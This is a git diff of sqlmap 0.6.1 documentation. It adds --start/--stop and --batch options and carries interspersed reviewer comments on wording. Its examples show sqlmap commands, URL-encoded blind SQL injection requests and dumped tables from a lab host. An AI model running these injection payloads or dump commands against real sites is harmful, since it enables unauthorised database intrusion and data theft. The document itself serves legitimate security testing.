diff --git a/doc/ChangeLog b/doc/ChangeLog index 66b4c6d58..e20b5e146 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -2,7 +2,7 @@ sqlmap (0.6.1-1) stable; urgency=low * Major bug fix to blind SQL injection bisection algorithm to handle an exception; - * Added a Metasploit 3 auxiliary module to run sqlmap; + * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; * Implemented --start and --stop options to set the first and the last @@ -12,6 +12,9 @@ sqlmap (0.6.1-1) stable; urgency=low * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; + * Changed the order sqlmap dump table entries from column by column to + row by row. Now it also dumps entries as they are stored in the tables, + not forcing the entries' order alphabetically anymore; * Minor bug fix to correctly handle parameters' value with % character. -- Bernardo Damele A. G. Fri, 10 Oct 2008 10:00:00 +0100 diff --git a/doc/README.html b/doc/README.html index 46bde7d5f..68be60888 100644 --- a/doc/README.html +++ b/doc/README.html @@ -245,8 +245,8 @@ those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted -string and all of these three datatypes with zero, one and two -parenthesis to correctly detect which is the SELECT statement syntax to +string and all of these three datatypes with zero to two parenthesis +to correctly detect which is the SELECT statement syntax to perform further injections with. It is also possible to specify the parameter(s) that you want to perform tests and use for injection on.
  • Option to specify the maximum number of concurrent HTTP @@ -277,6 +277,9 @@ and resume the injection from this file in a second time.
  • Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
  • +
  • Integration with other IT security related open source projects, +Metasploit and +w3af.
  • PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR, or similar, database management system function.
  • @@ -292,19 +295,19 @@ It is available in various formats:

    @@ -331,7 +334,7 @@ and
     $ python sqlmap.py -h
     
    -    sqlmap/0.6.1.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    +    sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                             and Daniele Bellucci <daniele.bellucci@gmail.com>
         
     Usage: sqlmap.py [options] {-u <URL> | -g <google dork> | -c <config file>}
    @@ -379,13 +382,16 @@ Options:
         --dbs               Enumerate DBMS databases
         --tables            Enumerate DBMS database tables (opt: -D)
         --columns           Enumerate DBMS database table columns (req: -T, -D)
    -    --dump              Dump DBMS database table entries (req: -T, -D opt: -C)
    +    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
    +                        --start, --stop)
         --dump-all          Dump all DBMS databases tables entries
         -D DB               DBMS database to enumerate
         -T TBL              DBMS database table to enumerate
         -C COL              DBMS database table column to enumerate
         -U USER             DBMS user to enumerate
         --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    +    --start=LIMITSTART  First table entry to dump
    +    --stop=LIMITSTOP    Last table entry to dump
         --sql-query=QUERY   SQL SELECT query to be executed
         --sql-shell         Prompt for an interactive SQL shell
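Review bot: the --dump help line now lists --start and --stop among its options, but the --dump-all line directly below it does not, so the help text should say whether the two limits are honoured by --dump-all too (or are silently ignored there). Also, the descriptions "First table entry to dump" / "Last table entry to dump" leave it open whether LIMITSTART counts from 0 or from 1; the one-word addition "(1-based)" on both lines would settle it for anyone scripting the tool.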
     
    @@ -417,6 +423,7 @@ Options:
         -s SESSIONFILE      Save and resume all data retrieved on a session file
         -c CONFIGFILE       Load options from a configuration INI file
         --save              Save options on a configuration INI file
    +    --batch             Never ask for user input, use the default behaviour
     

    @@ -528,7 +535,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:28] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:29] [INFO] testing MySQL @@ -537,7 +544,7 @@ Connection: close GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -555,7 +562,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:32] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200): @@ -573,7 +580,7 @@ Content-Type: text/html GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200): @@ -600,7 +607,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:23] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200): 
@@ -2042,7 +2049,8 @@ is connected to, which is always public.

    Dump database tables entries

    -

    Options: --dump, -C, -T and -D

    +

    Options: --dump, -C, -T, -D, +--start and --stop

    It is possible to dump the entries for a specific database table. This functionality depends on both -T to specify the table name @@ -2058,15 +2066,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+

    @@ -2112,15 +2120,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca Database: public Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | | nameisnull | ++----+----------------------------------------------+-------------------+ [hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/ 192.168.1.121/dump/public/users.csv' @@ -2138,6 +2146,40 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv

    +

    You can also provide the --start and/or the --stop option +to limit the dump to a range of entries.

    +

    +

      +
    • --start specifies the first entry to enumerate
    • +
    • --stop specifies the last entry to enumerate
    • +
    +

    + +

    Example on a MySQL 5.0.51 target:

    +

    +

    +
    +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump \
    +  -T users -D test --start 2 --stop 4
    +
    +Database: test
    +Table: users
    +[3 entries]
    ++----+----------------------------------------------+-------------------+
    +| id | name                                         | surname           |
    ++----+----------------------------------------------+-------------------+
    +| 2  | fluffy                                       | bunny             |
    +| 3  | wu                                           | ming              |
    +| 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
    ++----+----------------------------------------------+-------------------+
    +
    +
    +

    + +

    As you can see, sqlmap is very flexible: you can leave it automatically +enumerate the whole database table up to a single column of a specific +table entry.

    +

    Dump all databases tables entries
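Review bot: the new --start/--stop paragraph never defines what an entry position is. The example (--start 2 --stop 4 on a five-row table returning 3 entries) implies a 1-based, inclusive range, but the text should state that explicitly, and should also say what order the positions refer to: the ChangeLog hunk in this same commit (whose entry should read "Changed the order in which sqlmap dumps table entries") stops forcing an alphabetical order and dumps rows "as they are stored in the tables", which a DBMS does not guarantee to be stable between runs, so a range resumed from a session file may not map to the same rows on the second run. Two smaller points in the same hunk: the list items say "specifies the first entry to enumerate" while the help text added earlier in this patch says "First table entry to dump", so pick one verb; and "you can leave it automatically enumerate the whole database table" should read "you can let it automatically enumerate the whole database table". The identical text is added to README.sgml in hunk @@ -2070,6 +2078,39, which is presumably the source the HTML is generated from, so the fix belongs there as well.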

    @@ -2153,15 +2195,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ Database: information_schema Table: CHARACTER_SETS @@ -2246,15 +2288,15 @@ Table: spt_datatype_info_ext Database: master Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 2 | fluffy | bunny | -| 1 | luther | blisset | -| 3 | wu | ming | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 2 | fluffy | bunny | +| 1 | luther | blisset | +| 3 | wu | ming | +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ [...] @@ -3123,7 +3165,8 @@ back-end DBMS: MySQL >= 5.0.0

    Option: --save

    - +

    It is possible to save the command line options to a configuration INI +file.

    Example on a PostgreSQL 8.2.7 target:

    @@ -3231,6 +3274,53 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.

    +

    Act in non-interactive mode

    + +

    Option: --batch

    + +

    If you want sqlmap to run as a batch tool, without interacting with you in +case of a choice has to be done, you can force it by using --batch +option than letting sqlmap go for a default behaviour.

    + +

    Example on a MySQL 5.0.51 target:

    +

    +

    +
    +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" -v 1 \
    +  --batch
    +
    +[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
    +[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
    +[hh:mm:22] [INFO] GET parameter 'id' is dynamic
    +[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
    +[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
    +[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
    +[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
    +[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
    +[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
    +[hh:mm:22] [INFO] GET parameter 'name' is dynamic
    +[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
    +[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
    +[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
    +[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
    +[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
    +[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
    +[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
    +[0] place: GET, parameter: id, type: numeric (default)
    +[1] place: GET, parameter: name, type: stringsingle
    +[q] Quit
    +Choice: 0
    +[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
    +[...]
    +back-end DBMS:  MySQL >= 5.0.0
    +
    +
    +

    + +

    As you can see, sqlmap choosed automatically to injection on the first +vulnerable parameter which is the default behaviour.

    + +

    6. Disclaimer

    sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY diff --git a/doc/README.pdf b/doc/README.pdf index 99e90c9a6..ed2cc1659 100644 Binary files a/doc/README.pdf and b/doc/README.pdf differ diff --git a/doc/README.sgml b/doc/README.sgml index 05e02a408..4c760fc18 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -207,8 +207,8 @@ those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted -string and all of these three datatypes with zero, one and two -parenthesis to correctly detect which is the SELECT statement syntax to +string and all of these three datatypes with zero to two parenthesis +to correctly detect which is the SELECT statement syntax to perform further injections with. It is also possible to specify the parameter(s) that you want to perform tests and use for injection on. Option to specify the maximum number of concurrent HTTP @@ -239,6 +239,9 @@ and resume the injection from this file in a second time. Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file. +Integration with other IT security related open source projects, + and . PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR, or similar, database management system function. 
@@ -254,19 +257,19 @@ name="SourceForge File List page">. It is available in various formats: - operating system independent. - operating system independent. - operating system independent. - architecture independent for Debian and any other Debian derivated GNU/Linux distribution. - architecture independent for Fedora and any other operating system that can install RPM packages. - that does not require the Python interpreter to be installed on the operating system. @@ -294,7 +297,7 @@ and . $ python sqlmap.py -h - sqlmap/0.6.1.1 coded by Bernardo Damele A. G. + sqlmap/0.6.1 coded by Bernardo Damele A. G. and Daniele Bellucci Usage: sqlmap.py [options] {-u | -g | -c } @@ -342,13 +345,16 @@ Options: --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables (opt: -D) --columns Enumerate DBMS database table columns (req: -T, -D) - --dump Dump DBMS database table entries (req: -T, -D opt: -C) + --dump Dump DBMS database table entries (req: -T, -D opt: -C, + --start, --stop) --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables + --start=LIMITSTART First table entry to dump + --stop=LIMITSTOP Last table entry to dump --sql-query=QUERY SQL SELECT query to be executed --sql-shell Prompt for an interactive SQL shell @@ -380,6 +386,7 @@ Options: -s SESSIONFILE Save and resume all data retrieved on a session file -c CONFIGFILE Load options from a configuration INI file --save Save options on a configuration INI file + --batch Never ask for user input, use the default behaviour 
@@ -486,7 +493,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:28] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:29] [INFO] testing MySQL @@ -495,7 +502,7 @@ Connection: close GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -511,7 +518,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:32] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200): @@ -529,7 +536,7 @@ Content-Type: text/html GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200): @@ -554,7 +561,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:23] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200): 
@@ -1977,7 +1984,8 @@ is connected to, which is always public. Dump database tables entries

    -Options: --dump, -C, -T and -D +Options: --dump, -C, -T, -D, +--start and --stop

    It is possible to dump the entries for a specific database table. @@ -1994,15 +2002,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+

    @@ -2046,15 +2054,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca Database: public Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | | nameisnull | ++----+----------------------------------------------+-------------------+ [hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/ 192.168.1.121/dump/public/users.csv' @@ -2070,6 +2078,39 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "5","","nameisnull" +

    +You can also provide the --start and/or the --stop option +to limit the dump to a range of entries. + + +--start specifies the first entry to enumerate +--stop specifies the last entry to enumerate + + +

    +Example on a MySQL 5.0.51 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump \ + -T users -D test --start 2 --stop 4 + +Database: test +Table: users +[3 entries] ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 2 | fluffy | bunny | +| 3 | wu | ming | +| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | ++----+----------------------------------------------+-------------------+ + + +

    +As you can see, sqlmap is very flexible: you can leave it automatically +enumerate the whole database table up to a single column of a specific +table entry. + Dump all databases tables entries @@ -2087,15 +2128,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ Database: information_schema Table: CHARACTER_SETS 
@@ -2179,15 +2220,15 @@ Table: spt_datatype_info_ext Database: master Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 2 | fluffy | bunny | -| 1 | luther | blisset | -| 3 | wu | ming | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 2 | fluffy | bunny | +| 1 | luther | blisset | +| 3 | wu | ming | +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ [...] @@ -3039,6 +3080,8 @@ back-end DBMS: MySQL >= 5.0.0 Option: --save

    +It is possible to save the command line options to a configuration INI +file.

    Example on a PostgreSQL 8.2.7 target: @@ -3140,6 +3183,54 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2. +Act in non-interactive mode + +

    +Option: --batch + +

    +If you want sqlmap to run as a batch tool, without interacting with you in +case of a choice has to be done, you can force it by using --batch +option than letting sqlmap go for a default behaviour. + +

    +Example on a MySQL 5.0.51 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" -v 1 \ + --batch + +[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic +[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic +[hh:mm:22] [INFO] GET parameter 'id' is dynamic +[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis +[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id' +[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id' +[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis +[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic +[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic +[hh:mm:22] [INFO] GET parameter 'name' is dynamic +[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis +[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name' +[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable +[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name' +[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name' +[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis +[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead: +[0] place: GET, parameter: id, type: numeric (default) +[1] place: GET, parameter: name, type: stringsingle +[q] Quit +Choice: 0 +[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode +[...] +back-end DBMS: MySQL >= 5.0.0 + + +

    +As you can see, sqlmap choosed automatically to injection on the first +vulnerable parameter which is the default behaviour. + + Disclaimer
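Review bot: the --batch paragraph is hard to parse: "without interacting with you in case of a choice has to be done, you can force it by using --batch option than letting sqlmap go for a default behaviour" should read along the lines of "whenever a choice has to be made, pass the --batch option and sqlmap will take the default behaviour instead of prompting you". Likewise "sqlmap choosed automatically to injection on the first vulnerable parameter" should be "sqlmap automatically chose to inject on the first vulnerable parameter". Please also check the transcript: the command is run with -v 1, yet the output contains a "[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode" line, so either that message is logged at info level or the example should use the verbosity level that actually shows DEBUG output. Finally, the text should say that --batch answers every prompt with its default, not only the injection-point choice shown here, since that is what the help line "Never ask for user input, use the default behaviour" promises. The README.html copy of this section (hunk @@ -3231,6 +3274,53) carries the same wording and needs the same changes.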

    diff --git a/doc/THANKS b/doc/THANKS index c5eac46ac..9b5fcdc97 100644 --- a/doc/THANKS +++ b/doc/THANKS @@ -87,12 +87,12 @@ M Simkin Alessandro Tanasi for extensively beta-testing sqlmap - for suggesting many features and reporting some minor bugs + for suggesting many features and reporting some bugs Efrain Torres for helping me out to improve the Metasploit Framework 3 sqlmap - auxiliary module and the integration with Metasploit WMAP framework - for his great Metasploit WMAP framework + auxiliary module and the integration with Metasploit WMAP Framework + for his great Metasploit WMAP Framework Sandro Tosi for helping to create sqlmap Debian package correctly diff --git a/extra/msfauxmod/README b/extra/msfauxmod/README.txt similarity index 92% rename from extra/msfauxmod/README rename to extra/msfauxmod/README.txt index b37865b27..71293e6d8 100644 --- a/extra/msfauxmod/README +++ b/extra/msfauxmod/README.txt @@ -1,5 +1,11 @@ To use Metasploit's sqlmap auxiliary module launch msfconsole and follow -the example below: +the example below. + +Note that if you are willing to run Metasploit's sqlmap auxiliary module on +Metasploit Framework 3.0 or 3.1 you first need to copy wmap_sqlmap.rb to +your /modules/auxiliary/scanner/http/ folder then launch +msfconsole because this module has been officially integrated in Metasploit +from the release 3.2. $ ./msfconsole
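Review bot: the note added to extra/msfauxmod/README.txt tells the user to copy wmap_sqlmap.rb to "your /modules/auxiliary/scanner/http/ folder", which reads as an absolute path from the filesystem root; write it relative to the Metasploit installation directory instead (e.g. "the modules/auxiliary/scanner/http/ directory under your Metasploit Framework install"). Two wording fixes in the same hunk: "if you are willing to run" should be "if you want to run", and "officially integrated in Metasploit from the release 3.2" should be "as of release 3.2". Since the file is renamed from README to README.txt, also check that nothing else in the tree (packaging file lists, install scripts) still refers to the old name.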